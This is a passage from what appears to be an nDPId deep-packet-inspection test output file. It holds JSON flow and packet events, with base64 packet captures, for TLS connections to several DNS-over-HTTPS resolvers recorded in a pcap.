/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiw
xxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"} +00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1S
PeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSm
sTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUV
l+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfy